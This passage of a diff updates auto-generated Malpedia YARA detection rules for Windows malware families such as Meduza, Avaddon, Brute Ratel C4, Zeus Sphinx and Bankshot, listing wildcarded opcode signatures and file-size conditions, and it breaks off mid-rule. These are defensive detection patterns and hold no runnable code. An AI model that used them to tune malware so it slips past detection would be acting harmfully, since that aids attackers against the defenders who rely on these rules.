-		logic_hash = "8589aa9b6f63efad7fde0dd033ffc7aedc0446802bcc3cc8f7fcdbf116768199"
+		logic_hash = "6035737199462cdcfa6d56d9e4b447822bb430a938cb907f7ba0f0edbb7456df"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -79773,32 +80131,44 @@ rule MALPEDIA_Win_Nimbo_C2_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7f16 31d2 4889d9 e8???????? ba01000000 4885c0 480f4fc2 }
-		$sequence_1 = { c744245801000000 e8???????? b90f000000 4989c5 4885c0 7407 488b00 }
-		$sequence_2 = { 83e03f 41886c1c13 83c880 4188441c12 eb9d 85c0 789c }
-		$sequence_3 = { e8???????? ebe3 e8???????? 4889c1 e8???????? 4883bdd8fcffff00 7414 }
-		$sequence_4 = { 4889c1 e8???????? ba20000000 4889c1 e8???????? 4989c4 4885ff }
-		$sequence_5 = { 741a 49837d0000 7e13 4c89e1 e8???????? 4c89ea }
-		$sequence_6 = { c7859cfcffff00000000 ff5018 8905???????? 85c0 0f85f6020000 488d8dc8fcffff e8???????? }
-		$sequence_7 = { 56 53 4883ec20 31f6 4889cb 0fb6fa 4885db }
-		$sequence_8 = { c605????????01 48c705????????02000000 c605????????01 48c705????????03000000 48c705????????04000000 c605????????02 }
-		$sequence_9 = { b907000000 4c8b8424c0000000 ba03000000 4d89ce e8???????? ba03000000 b906000000 }
+		$sequence_0 = { 8bfc f3a5 e8???????? 81c420020000 }
+		$sequence_1 = { 7d07 33c0 e9???????? 6820020000 }
+		$sequence_2 = { e8???????? 81c420020000 85c0 7407 68???????? eb05 68???????? }
+		$sequence_3 = { b988000000 8bf3 8bfc f3a5 }
+		$sequence_4 = { ffd6 8bf8 3bfb 7462 }
+		$sequence_5 = { 59 8d45e8 59 53 50 }
+		$sequence_6 = { 51 ff15???????? 6a00 6800200000 8d9554daffff 52 8b8554faffff }
+		$sequence_7 = { 5f 889000010000 888801010000 5e 83c410 }
+		$sequence_8 = { 750f c78508daffff00000000 e9???????? 6a04 8d8d54daffff }
+		$sequence_9 = { ebc0 ebbe ebbc ebba ebb8 ebb6 5f }
+		$sequence_10 = { 6a00 8b8508daffff 2b85fcd9ffff 50 8b8d04daffff }
+		$sequence_11 = { f7ff 0fb6c2 8945f0 03c1 8855ff 8a10 88140e }
+		$sequence_12 = { 8b74241c 57 8a8800010000 8a9001010000 33ff 884c2408 }
+		$sequence_13 = { 85c0 7407 33c0 e9???????? 6a00 6a01 6a02 }
+		$sequence_14 = { 85f6 7417 8b4c2414 8d447b02 50 }
+		$sequence_15 = { 8a9001010000 33ff 884c2408 3bf7 88542424 897c2410 }
+		$sequence_16 = { 8b5c2408 56 57 668b03 33d2 33f6 33ff }
+		$sequence_17 = { 8b4c2410 81e1ff000000 8a1c01 885c241c }
+		$sequence_18 = { 83c10c 51 8d9554daffff 52 e8???????? 83c408 6a00 }
+		$sequence_19 = { 3bf8 7426 8d4dd4 53 51 8bcf 2bc8 }
+		$sequence_20 = { 3bfb 0f8c54ffffff 8a4c242c 5d 5b }
+		$sequence_21 = { 42 6685c0 75ea 85f6 }
 
 	condition:
-		7 of them and filesize < 1141760
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Meduza_Auto : FILE
+rule MALPEDIA_Win_Listrix_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "53f96cd6-21f2-53a2-bbb8-b71563537ed2"
+		id = "f00b612a-8ee6-5314-b10b-7290e9e1e604"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.meduza"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.meduza_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.listrix_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "14b88dc41a5c318d90c279963aa5ad461ee65cb9acf5c901876d99dfeb325a5a"
+		logic_hash = "2287c5f695d49f8318bd5f0c78a77cdf4d2c441f03bbfda75594fd76fd20827f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -79812,32 +80182,32 @@ rule MALPEDIA_Win_Meduza_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f81f 0f87f959fdff 51 52 e8???????? 83c408 c705????????00000000 }
-		$sequence_1 = { 898ddcfcffff 8d8d80f5ffff 8985d8fcffff 8d5101 660fef8dd0fcffff 0f298d80f5ffff }
-		$sequence_2 = { e8???????? c645fc1d 0f57c0 c785d8f6ffff9929e731 c785dcf6ffffa8016d5b 8b85d8f6ffff 8b8ddcf6ffff }
-		$sequence_3 = { ff15???????? a1???????? 85c0 7407 50 ff15???????? ff15???????? }
-		$sequence_4 = { 8945dc 8b45d4 03c2 6a00 6800ca9a3b 13cf 51 }
-		$sequence_5 = { 8b4114 8b5110 2bc2 3bc7 7218 83791410 8d4201 }
-		$sequence_6 = { c78540ffffff00000000 c78544ffffff00000000 85f6 7424 83c8ff f00fc14604 751a }
-		$sequence_7 = { 8b8ddce4ffff 0f288d30e1ffff 898dfcfcffff 8d8d30e1ffff 8985f8fcffff 8d5101 660fef8df0fcffff }
-		$sequence_8 = { 894da4 c7855cffffff9d412b44 8b8558ffffff 8b8d5cffffff 0f288d20ffffff 894dac 8d8d20ffffff }
-		$sequence_9 = { 8b4dec c745e8d6352f2b 898590feffff 898d94feffff c745ec4a55cf55 8b45e8 8b4dec }
+		$sequence_0 = { 8d8dc0f5ffff 51 ffd3 85c0 7454 57 }
+		$sequence_1 = { 85f6 740d f68594f5ffff10 0f84ac010000 8b1d???????? 68???????? 8d85c0f5ffff }
+		$sequence_2 = { 8d46ff 50 8b8584f5ffff 51 52 50 8d8df4fbffff }
+		$sequence_3 = { 8d85f4f7ffff 50 ff15???????? 8b7518 }
+		$sequence_4 = { 89b588f5ffff 397510 0f8e4c020000 57 8d85f4f7ffff 50 }
+		$sequence_5 = { 50 8d4c2470 51 c744242430794000 }
+		$sequence_6 = { c1e802 89442408 c744240c02000000 85c0 0f8408010000 }
+		$sequence_7 = { 8bc7 c1f805 c1e606 033485e0ad4000 8b45f8 8b00 }
+		$sequence_8 = { a1???????? c705????????cc274000 8935???????? a3???????? ff15???????? a3???????? }
+		$sequence_9 = { 6a00 8d95e4f9ffff 52 ff15???????? 85c0 0f84bb000000 }
 
 	condition:
-		7 of them and filesize < 1433600
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Teleport_Auto : FILE
+rule MALPEDIA_Win_Startpage_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "27108ab3-6cb2-5111-9364-d7f24d03816a"
+		id = "32039b80-5611-5dab-bcba-b3de61ca7c44"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.teleport"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.teleport_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.startpage_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "833087ce8b406b0ed8db8d58a090084d0531be2127d4429df6d3e776d65bddb6"
+		logic_hash = "264fe8c064e54c165fc131dc307fd06ea57035a4276b77eac419d3cf78ed64b4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -79851,32 +80221,32 @@ rule MALPEDIA_Win_Teleport_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 330c8560ba4200 0fb6c2 8b55f4 330c8560b64200 334f30 }
-		$sequence_1 = { c1e810 33148da0e24200 8b4df8 0fb6c0 }
-		$sequence_2 = { 75f5 2bcf d1f9 7429 8bca 8d4102 8985ccf7ffff }
-		$sequence_3 = { 8b4df4 c1e918 331485a0fa4200 8b45fc 0fb6c0 331485a0f64200 339774ffffff }
-		$sequence_4 = { 3041ff 83ea01 75f2 eb0d 0f100f 0f1003 660fefc8 }
-		$sequence_5 = { 660fd60f 8d7f08 8b048d841c4100 ffe0 f7c703000000 7413 8a06 }
-		$sequence_6 = { 8bca c1e918 8bc2 8b0c8d60c24200 c1e810 0fb6c0 330c8560be4200 }
-		$sequence_7 = { 8b8514feffff 83c840 8d8d00feffff c645fc0a 83c808 eb54 c785f0fdffff80b54200 }
-		$sequence_8 = { 8a87fc314300 08441619 42 0fb64101 3bd0 76e5 }
-		$sequence_9 = { 52 8b01 8b4010 ffd0 84c0 747e 68???????? }
+		$sequence_0 = { 0f8455feffff 663906 7407 83c602 3bf3 75f4 3bf3 }
+		$sequence_1 = { 59 85f6 746b ff75f0 6a00 56 e8???????? }
+		$sequence_2 = { 770f 8bc1 50 e8???????? 83c404 32c0 eb08 }
+		$sequence_3 = { 8a430c 8a490c 88420c 8b55f0 884b0c 807b0c01 0f8530010000 }
+		$sequence_4 = { 85ff 7414 8bcf e8???????? 8bcf }
+		$sequence_5 = { e8???????? 50 8d8d90feffff e8???????? 46 3b7334 72e5 }
+		$sequence_6 = { 8bf9 8d7718 56 ff7704 ffd3 8d45ec 0f57c0 }
+		$sequence_7 = { 85d2 7507 b803400080 eb47 8b450c 56 33f6 }
+		$sequence_8 = { 895dfc 895dd4 81fb80000000 7d4d 8b049da0974500 8945d8 85c0 }
+		$sequence_9 = { 5b 8be5 5d c3 ff15???????? 0fb7c8 81c900000780 }
 
 	condition:
-		7 of them and filesize < 458752
+		7 of them and filesize < 2277376
 }
-rule MALPEDIA_Win_Avaddon_Auto : FILE
+rule MALPEDIA_Win_Zeus_Sphinx_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a92a672c-0df0-579b-b5cc-abf6eb5f22bf"
+		id = "2404684e-f88f-5795-bbdc-963d4ddd15f4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.avaddon_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.zeus_sphinx_auto.yar#L1-L158"
 		license_url = "N/A"
-		logic_hash = "9da4ad197260f3ad47fcf04fe9c86aafe2cfaae8d70042fb37f0ac71730ef837"
+		logic_hash = "f8ae31764c1b32c59de8e620b679e44d219bf08111b95222bfeb2c4359a4f338"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -79890,32 +80260,38 @@ rule MALPEDIA_Win_Avaddon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 56 ff15???????? 85c0 7527 ff15???????? 3d16000980 }
-		$sequence_1 = { f20f100d???????? 0fb6c0 f20f5cca 660f6ec0 f30fe6c0 0fb6c2 f20f59c8 }
-		$sequence_2 = { ff75d4 ffd6 c745fcffffffff 8b75ac 8945b4 85f6 }
-		$sequence_3 = { 8b5db8 037014 0375cc 8b4308 0faf45f0 03c2 }
-		$sequence_4 = { 83781408 8b7810 7202 8b08 ff75a8 8bd7 6a01 }
-		$sequence_5 = { 3dffffff7f 7743 03c0 56 50 e8???????? 8bf0 }
-		$sequence_6 = { 84c9 754e 8b4e14 03c7 3bc1 7239 8b06 }
-		$sequence_7 = { 0faf5708 8b4f14 0faf5704 0faf17 03d1 3bca 734c }
-		$sequence_8 = { 8b85fcfeffff 83c204 40 3b8570ffffff 8985fcfeffff 8b85d8feffff 0f8ce9feffff }
-		$sequence_9 = { ff10 8b45e4 83f808 7213 8d044502000000 50 ff75d0 }
+		$sequence_0 = { 50 e8???????? 891c24 89c6 e8???????? 83c410 8d65f4 }
+		$sequence_1 = { 52 52 ff35???????? 50 e8???????? 8b5508 83c40c }
+		$sequence_2 = { 50 e8???????? 83c414 68???????? e8???????? c70424???????? }
+		$sequence_3 = { 50 e8???????? 83c420 48 }
+		$sequence_4 = { 50 e8???????? 83c430 85c0 7e0c }
+		$sequence_5 = { 50 e8???????? 83c418 68???????? 68???????? }
+		$sequence_6 = { 50 e8???????? 84c0 745f 8d442414 }
+		$sequence_7 = { 50 e8???????? 83c410 c78324020000ffffffff c7832802000000000000 }
+		$sequence_8 = { 01fc eb98 035e14 8ade }
+		$sequence_9 = { 010d???????? 60 5a 98 }
+		$sequence_10 = { 0303 50 ff550c 8b3e }
+		$sequence_11 = { 020a 42 1af6 af }
+		$sequence_12 = { 0162c9 cf 0c06 3c3e }
+		$sequence_13 = { 003b c09bdbe23ea11c 695600663ec700 de07 }
+		$sequence_14 = { 010c02 3bf7 0f85f0f50000 e9???????? }
+		$sequence_15 = { 0008 d7 9f b2d3 }
 
 	condition:
-		7 of them and filesize < 2343936
+		7 of them and filesize < 3268608
 }
-rule MALPEDIA_Win_Poldat_Auto : FILE
+rule MALPEDIA_Win_Stinger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a4b71e9b-caa3-5e09-abcb-8fc111c1e88a"
+		id = "03e2d1ca-b846-5787-b683-28feb74dae3e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poldat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.poldat_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stinger_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "eec21397be824c40480269ad179cee66cff4f29ddc631fb679aa6de7be434481"
+		logic_hash = "64d2d0bb18e9f4889ac80d1e49c5ab473a950fa26645e6f561f71db4e8eb08f3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -79929,32 +80305,32 @@ rule MALPEDIA_Win_Poldat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b35???????? 6a08 66ab 58 }
-		$sequence_1 = { 57 6a05 6a00 68???????? }
-		$sequence_2 = { 50 e8???????? 68fe010000 8d86b8070000 57 }
-		$sequence_3 = { 8a50ff 881431 41 48 3d???????? 7ff1 8d45fc }
-		$sequence_4 = { 8b0c9d68c34100 8b5e04 23ca 03cb 33db 8a1cce 8d34ce }
-		$sequence_5 = { 50 ff15???????? 56 e8???????? 59 5f 5e }
-		$sequence_6 = { 8b4c241c 8b0c8d68c34100 23cf 03c1 8b4c241c d3ef 03ca }
-		$sequence_7 = { 750a c74720a0324000 895728 395724 7507 }
-		$sequence_8 = { 7233 e9???????? 8b4c243c 8b5c2410 8b7104 c7411824d84100 }
-		$sequence_9 = { f7f9 8bfa ffd6 50 }
+		$sequence_0 = { 8bec 81ec10000000 6804000080 6a00 8b5d08 }
+		$sequence_1 = { f6c441 0f854d010000 8b45f4 50 8b5d08 ff33 }
+		$sequence_2 = { 895df8 8965f4 ff75fc ff15???????? 90 90 }
+		$sequence_3 = { 6806000000 e8???????? 83c404 e9???????? 8be5 5d c21000 }
+		$sequence_4 = { e9???????? 68???????? 8b5d0c ff33 e8???????? 83c408 }
+		$sequence_5 = { a1???????? 85c0 891c85ecbe4000 750a }
+		$sequence_6 = { 6806000000 e8???????? 83c404 a3???????? 8965f8 68???????? }
+		$sequence_7 = { ff75fc 6802000000 bb94020000 e8???????? 83c41c 8945e8 }
+		$sequence_8 = { 6800000000 6800000000 68???????? ff35???????? 6800000000 ff15???????? 90 }
+		$sequence_9 = { 8b5d08 ff33 b902000000 e8???????? 83c408 8945f0 ff750c }
 
 	condition:
-		7 of them and filesize < 247808
+		7 of them and filesize < 197096
 }
-rule MALPEDIA_Win_Scarabey_Auto : FILE
+rule MALPEDIA_Win_Snatch_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6e60c4db-c5cb-54f4-b442-438a01df9af6"
+		id = "d74b7542-a17c-5e73-9f4b-d6fcbd7ec77a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarabey"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.scarabey_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.snatch_loader_auto.yar#L1-L174"
 		license_url = "N/A"
-		logic_hash = "5ddb90a30fda6ca95ac7c6c807a159ecb2fde4cde650e7522ca27b96c3f88797"
+		logic_hash = "58c7bbc8e69216b73bd02826084d61ba1cc9680e841df4cda286961c3330efac"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -79968,34 +80344,40 @@ rule MALPEDIA_Win_Scarabey_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a01 8d95b8d2ffff 52 ff15???????? 6a00 6a00 6a01 }
-		$sequence_1 = { 52 ff15???????? 68ff000000 6a02 53 895c2450 }
-		$sequence_2 = { 53 6a00 56 8985ecd6ffff ffd7 83fb01 0f8410010000 }
-		$sequence_3 = { 8d8504e7ffff 50 c78504e7ffff94000000 ff15???????? 6a01 }
-		$sequence_4 = { ff15???????? 8d4c2410 51 8bce e8???????? 6a0f }
-		$sequence_5 = { 7d04 8944241c 686666aa00 50 33db 6a02 895c2450 }
-		$sequence_6 = { 50 c78504e7ffff94000000 ff15???????? 6a01 8d8d54d2ffff 51 }
-		$sequence_7 = { 895c2450 c744244c68025300 ff15???????? 50 8d4c2444 e8???????? 8b442444 }
-		$sequence_8 = { 3d01010000 7d0d 8a4c181c 8888f0b15700 40 ebe9 33c0 }
-		$sequence_9 = { e8???????? 834dfcff 8d4dd4 c745d480185300 e8???????? e8???????? c3 }
+		$sequence_0 = { 53 56 57 33db bfe71edec0 895dfc }
+		$sequence_1 = { 8975fc 66397102 740b 42 0fb7c2 6639744102 }
+		$sequence_2 = { 85c0 7505 8b7dfc eb04 ffd0 8bf8 }
+		$sequence_3 = { 53 56 57 ffd0 5f 85c0 }
+		$sequence_4 = { 53 bb00040000 56 8bcb e8???????? 8bf0 }
+		$sequence_5 = { 83ec0c 56 33f6 8bd6 8975fc 66397102 }
+		$sequence_6 = { 53 56 33f6 8bd9 57 85c0 7522 }
+		$sequence_7 = { 85c0 8bce 0f457dfc e8???????? }
+		$sequence_8 = { 5e eb03 83c704 83c304 41 833eff }
+		$sequence_9 = { 52 ff750c e8???????? 8945fc 0bc0 }
+		$sequence_10 = { 68???????? 58 ffd0 8945f0 }
+		$sequence_11 = { 53 57 56 33db 6a04 6800300000 }
+		$sequence_12 = { 41 3b4df8 72ee 8bc2 034508 5a 59 }
+		$sequence_13 = { 734f ff7510 e8???????? 8945f8 0bc0 7440 3b45fc }
+		$sequence_14 = { 0bc0 7440 3b45fc 773b 8b750c 8b7d10 }
+		$sequence_15 = { 33c9 8a0431 0ac0 741f }
 
 	condition:
-		7 of them and filesize < 3580928
+		7 of them and filesize < 262144
 }
-rule MALPEDIA_Win_Brute_Ratel_C4_Auto : FILE
+rule MALPEDIA_Win_Vyveva_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2e0925bc-6929-57fd-a204-d14352ab043b"
+		id = "609ee890-2ca7-5a62-be35-cd1b7bd5751c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.brute_ratel_c4_auto.yar#L1-L169"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vyveva"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vyveva_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "494c4fae1039f425b8c7198dfaa8d777cff4b0b0868ed2b5b99463571dc5c16b"
+		logic_hash = "0673ae4749420e7fc0134b23031a9015b50b7275847c92099461dcf3a81aa83d"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -80007,40 +80389,34 @@ rule MALPEDIA_Win_Brute_Ratel_C4_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? b801000000 4883c448 c3 48894c2408 }
-		$sequence_1 = { 4154 55 57 56 53 4883ec20 4c8d257f1e0400 }
-		$sequence_2 = { 89442438 4863442430 486bc010 488d0de32e0400 4803c8 488bc1 48634c2434 }
-		$sequence_3 = { 48c744242800000000 41b800060400 488d15d02f0000 488d4c2420 e8???????? }
-		$sequence_4 = { ffcd 85c0 75c7 4801de 8b4710 }
-		$sequence_5 = { 741a 85f6 740e 4889c1 baffffffff ff15???????? }
-		$sequence_6 = { 4533c0 ba01000000 48b90000008001000000 ff9424a0000000 89842480000000 83bc248000000000 750f }
-		$sequence_7 = { e8???????? 4889442428 4c8d0532200000 488b542428 }
-		$sequence_8 = { 0f1107 e8???????? 4885f6 7424 }
-		$sequence_9 = { 418b4cb708 458b44b70c 4c01f9 49d1e8 488b542430 }
-		$sequence_10 = { 83782800 0f8491000000 488b442430 83782000 7465 488b442430 }
-		$sequence_11 = { 418b44b710 418b3407 498d2c07 4883c504 ffce 660f1f440000 }
-		$sequence_12 = { 488b2d???????? 4889ce 895500 89d3 }
-		$sequence_13 = { 4c8d0532200000 488b542428 488d4c2420 e8???????? }
-		$sequence_14 = { 0f84d7000000 83f910 0f8550020000 0fb737 81e2c0000000 6685f6 }
-		$sequence_15 = { 83782000 7465 488b442430 488b00 8b4028 488b4c2440 }
+		$sequence_0 = { 58 50 5f 5f 50 5f 8b4c2430 }
+		$sequence_1 = { 7404 894424fc 83ec04 2bc1 58 75e2 8d4c2418 }
+		$sequence_2 = { 51 89442414 8bce e8???????? 8b942430020000 8d44240c 6a04 }
+		$sequence_3 = { ffb5ac000000 58 85c0 0f85f2010000 68???????? ff15???????? 50 }
+		$sequence_4 = { 8b4c2410 6a00 51 6a03 6a00 }
+		$sequence_5 = { 8d8c2468010000 50 51 6a41 e8???????? 83c404 ffd0 }
+		$sequence_6 = { 8d4c2418 c644243800 e8???????? 8d4c2424 57 51 8d4d14 }
+		$sequence_7 = { 83ec04 33db 8d5c194c 83eb4c c74424fc0c000000 83ec04 }
+		$sequence_8 = { 5b 53 59 59 53 51 5b }
+		$sequence_9 = { 8bce e8???????? 8b942430020000 8d44240c 6a04 50 56 }
 
 	condition:
-		7 of them and filesize < 607232
+		7 of them and filesize < 360448
 }
-rule MALPEDIA_Win_Bankshot_Auto : FILE
+rule MALPEDIA_Win_Mmon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "86c817d0-2034-5c81-834f-97c8e0010057"
+		id = "b18c07bb-08ed-5694-944e-153520890ae8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bankshot_auto.yar#L1-L425"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mmon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mmon_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "c44d83d86e3231c57414d81c161d108153b74cf74b3e3cc50eaea1f55952d16d"
+		logic_hash = "0a47221b764bce60b9ce9e11d4cf6ad81a3b7814241076d22b6772dafdc7fe22"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -80052,67 +80428,32 @@ rule MALPEDIA_Win_Bankshot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf8 8d5101 8a01 41 84c0 75f9 57 }
-		$sequence_1 = { 81ec48040000 a1???????? 33c5 8945f8 53 }
-		$sequence_2 = { 7ccb 3bca 0f8d20f8ffff 0f1f00 80b40ddc3dffffaa 41 }
-		$sequence_3 = { 83faff 747b 33c9 85d2 7e77 }
-		$sequence_4 = { 83c40c e8???????? 99 b907000000 }
-		$sequence_5 = { 57 50 e8???????? 83c40c 6b45e430 8945e0 8d80d0e10110 }
-		$sequence_6 = { 8d90c4e10110 5f 668b02 8d5202 668901 8d4902 83ef01 }
-		$sequence_7 = { 8bb5a838ffff 8d8db438ffff 68???????? 894608 c70610000000 c7460400000000 }
-		$sequence_8 = { 8945e0 8d80d0e10110 8945e4 803800 8bc8 7435 8a4101 }
-		$sequence_9 = { ffd7 c785c03affff00000000 8b85bc3affff 85c0 }
-		$sequence_10 = { 85db 7507 c746340c7b0110 57 ff7634 }
-		$sequence_11 = { e8???????? 83c404 89861c020000 8b45e0 8d4e0c 6a06 8d90c4e10110 }
-		$sequence_12 = { 7515 8b45fc 817848b8e40110 7409 ff7048 e8???????? 59 }
-		$sequence_13 = { c7832005000000008000 eb4e b9???????? 8d85d4fdffff }
-		$sequence_14 = { e9???????? 57 33ff 8bcf 8bc7 894de4 3998c0e10110 }
-		$sequence_15 = { 8b4508 c700???????? 8b4508 898850030000 8b4508 59 c74048b8e40110 }
-		$sequence_16 = { 0f10440b10 0f28ca 660fefc8 0f114c0b10 83c120 3bce 7cd9 }
-		$sequence_17 = { 33c0 8996a0af0600 668b04dd66734100 83fb02 898694af0600 }
-		$sequence_18 = { 83c101 894df8 837df803 0f83d2000000 6a04 }
-		$sequence_19 = { eb3a 81c694010000 740e f30f7e06 660fd685ccfeffff eb24 }
-		$sequence_20 = { 7506 8d4707 50 eb01 57 8d7e10 }
-		$sequence_21 = { 894df8 837dd8ff 7464 6a00 }
-		$sequence_22 = { ff15???????? 4885c0 0f8482000000 48ffc3 4a89042f 488d3cdd00000000 }
-		$sequence_23 = { 41 890d???????? 33c0 8b4df4 64890d00000000 }
-		$sequence_24 = { 44897c2420 ff15???????? 488bf8 83caff }
-		$sequence_25 = { 0f84b6000000 488d3ded3e0000 498bf0 b903000000 f3a6 }
-		$sequence_26 = { ba7a341200 488bcf 8905???????? e8???????? 488d0d7d2b0000 }
-		$sequence_27 = { 23f0 68???????? 89b564f2ffff ffd7 68???????? 50 ffd3 }
-		$sequence_28 = { 81fae7030000 7708 81c2e8030000 8910 8b0b 6a00 68e6210000 }
-		$sequence_29 = { c705????????01000000 c705????????05000000 66c705????????3c00 c705????????04000000 e8???????? 68???????? }
-		$sequence_30 = { 0f859b010000 c745e068410110 8b4508 8bcf }
-		$sequence_31 = { 85c0 7543 8b542454 8d4c2458 6884140000 }
-		$sequence_32 = { ff15???????? 68???????? 57 8985ccfbffff ff15???????? }
-		$sequence_33 = { 8bec 8b4508 57 8d3c85108c7100 8b0f 85c9 }
-		$sequence_34 = { 52 e8???????? 8bf0 83c414 f7de 1bf6 }
-		$sequence_35 = { 837d0c00 7455 8b4d0c 51 ff15???????? }
-		$sequence_36 = { ff15???????? 488d1556ea0000 488d4c2420 488905???????? ff15???????? 807c242000 }
-		$sequence_37 = { 448bc1 4a8d4c0d00 4903d4 e8???????? 488b461c ffc7 4883c328 }
-		$sequence_38 = { 52 50 e8???????? 6a02 8d8c24b0080000 6a00 8d54244c }
-		$sequence_39 = { 3bd1 7f1e 6b0d????????3c 030d???????? }
-		$sequence_40 = { 56 57 6884140000 6a40 ff15???????? 8bd8 }
-		$sequence_41 = { e8???????? 488d0de3330000 e8???????? 488d0d87990000 e8???????? 84c0 0f85b6000000 }
-		$sequence_42 = { 8b4c2430 896804 895008 89480c e8???????? }
-		$sequence_43 = { 50 e8???????? 83c404 898568f8ffff 8d8df4fdffff 51 }
-		$sequence_44 = { ff15???????? 488bf8 4885c0 0f84b5000000 }
+		$sequence_0 = { 8b4710 3bc8 770d 83c8ff }
+		$sequence_1 = { 8d48f3 83f906 0f878b000000 8d70ff 33db 33ff 83feff }
+		$sequence_2 = { 51 6800040000 50 6a00 6800130000 ff15???????? 8b45b4 }
+		$sequence_3 = { 68???????? 56 897dfc 89bd4cffffff 898d50ffffff }
+		$sequence_4 = { 68???????? c684247810000001 e8???????? 83c40c 50 }
+		$sequence_5 = { c1f905 8b0c8d606a4200 c1e006 0fbe440104 83e040 5d c3 }
+		$sequence_6 = { 7303 8d4594 8b8d54ffffff 6a20 51 }
